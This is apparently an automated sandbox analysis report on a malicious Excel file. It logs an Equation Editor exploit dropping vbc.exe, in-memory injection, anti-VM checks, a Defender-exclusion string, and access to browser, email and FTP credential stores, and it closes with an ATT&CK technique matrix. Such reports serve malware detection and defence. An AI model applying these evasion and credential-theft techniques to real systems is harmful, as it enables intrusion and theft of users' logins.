                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/18@0/1
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: vbc.exe.2.dr, Oz/uT.csCryptographic APIs: 'CreateDecryptor'
                    Source: vbc.exe.2.dr, Oz/uT.csCryptographic APIs: 'CreateDecryptor'
                    Source: vbc[1].exe.2.dr, Oz/uT.csCryptographic APIs: 'CreateDecryptor'
                    Source: vbc[1].exe.2.dr, Oz/uT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 4.2.vbc.exe.8c0000.1.unpack, Oz/uT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 4.2.vbc.exe.8c0000.1.unpack, Oz/uT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 4.0.vbc.exe.8c0000.0.unpack, Oz/uT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 4.0.vbc.exe.8c0000.0.unpack, Oz/uT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 5.0.vbc.exe.400000.11.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 5.0.vbc.exe.400000.11.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: Binary string: CallConvFastca.pdbx2 source: vbc.exe.2.dr, vbc[1].exe.2.dr
                    Source: Binary string: CallConvFastca.pdb source: vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr

                    Data Obfuscation

                    barindex
                    Source: vbc.exe.2.dr, va/x0.cs.Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: vbc[1].exe.2.dr, va/x0.cs.Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 4.2.vbc.exe.8c0000.1.unpack, va/x0.cs.Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 4.0.vbc.exe.8c0000.0.unpack, va/x0.cs.Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 5.0.vbc.exe.8c0000.10.unpack, va/x0.cs.Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 5.0.vbc.exe.8c0000.8.unpack, va/x0.cs.Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 5.0.vbc.exe.8c0000.3.unpack, va/x0.cs.Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 5.0.vbc.exe.8c0000.4.unpack, va/x0.cs.Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 5.0.vbc.exe.8c0000.2.unpack, va/x0.cs.Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: 5.0.vbc.exe.8c0000.6.unpack, va/x0.cs.Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                    Source: vbc.exe.2.dr, Oz/uT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: vbc[1].exe.2.dr, Oz/uT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 4.2.vbc.exe.8c0000.1.unpack, Oz/uT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 4.0.vbc.exe.8c0000.0.unpack, Oz/uT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 5.0.vbc.exe.8c0000.10.unpack, Oz/uT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 5.0.vbc.exe.8c0000.8.unpack, Oz/uT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 5.0.vbc.exe.8c0000.3.unpack, Oz/uT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 5.0.vbc.exe.8c0000.4.unpack, Oz/uT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 5.0.vbc.exe.8c0000.2.unpack, Oz/uT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 5.0.vbc.exe.8c0000.6.unpack, Oz/uT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_00781870 push esp; retn 002Dh
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_00782ED8 pushad ; iretd
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_00781880 pushad ; retn 002Dh
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: 4.2.vbc.exe.24d5ea4.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.2534e8c.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2240, type: MEMORYSTR
                    Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                    Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2032Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 2544Thread sleep time: -36461s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 1952Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 2116Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 408Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 408Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\Public\vbc.exe TID: 1928Thread sleep count: 9494 > 30
                    Source: C:\Users\Public\vbc.exe TID: 408Thread sleep count: 111 > 30
                    Source: C:\Users\Public\vbc.exe TID: 1928Thread sleep count: 246 > 30
                    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 9494
                    Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
                    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 36461
                    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\Public\vbc.exeThread delayed: delay time: 30000
                    Source: vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                    Source: vbc.exe, 00000005.00000002.668907940.000000000061D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !bqnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed.exe
                    Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameqnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed.exe4
                    Source: vbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668907940.000000000061D000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: qnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed.exe
                    Source: vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: vbc.exe, 00000005.00000002.668907940.000000000061D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: `!bqnrbzdfmzbzuurhfqqemumlniducnyded.exe
                    Source: vbc.exe, 00000005.00000002.668728779.0000000000270000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 4cqnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed$'w
                    Source: vbc.exe, 00000005.00000002.668907940.000000000061D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qnrbzdfmzbzuurhfqqemumlniducnyded.exe
                    Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: InternalNameqnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed.exe(
                    Source: vbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668907940.000000000061D000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668728779.0000000000270000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: qnrBzDfMzbzuUrHfqQEmuMLnIDuCnyDed
                    Source: vbc.exe, 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
                    Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
                    Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                    Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                    Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
                    Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.vbc.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.vbc.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.34f3920.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.3529940.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.34f3920.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.3529940.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.471126039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.469116733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.669256478.0000000002324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2240, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2408, type: MEMORYSTR
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: Yara matchFile source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.669256478.0000000002324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2408, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.vbc.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.vbc.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.34f3920.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.3529940.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.34f3920.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.vbc.exe.3529940.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.471126039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.469116733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.669256478.0000000002324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2240, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2408, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation
                    Path Interception111
                    Process Injection
                    111
                    Masquerading
                    2
                    OS Credential Dumping
                    211
                    Security Software Discovery
                    Remote Services1
                    Email Collection
                    Exfiltration Over Other Network Medium1
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts12
                    Exploitation for Client Execution
                    Boot or Logon Initialization Scripts1
                    Extra Window Memory Injection
                    1
                    Disable or Modify Tools
                    1
                    Credentials in Registry
                    1
                    Process Discovery
                    Remote Desktop Protocol11
                    Archive Collected Data
                    Exfiltration Over Bluetooth12
                    Ingress Tool Transfer
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
                    Virtualization/Sandbox Evasion
                    Security Account Manager131
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares2
                    Data from Local System
                    Automated Exfiltration1
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                    Process Injection
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object ModelInput CaptureScheduled Transfer21
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Remote System Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Obfuscated Files or Information
                    Cached Domain Credentials1
                    File and Directory Discovery
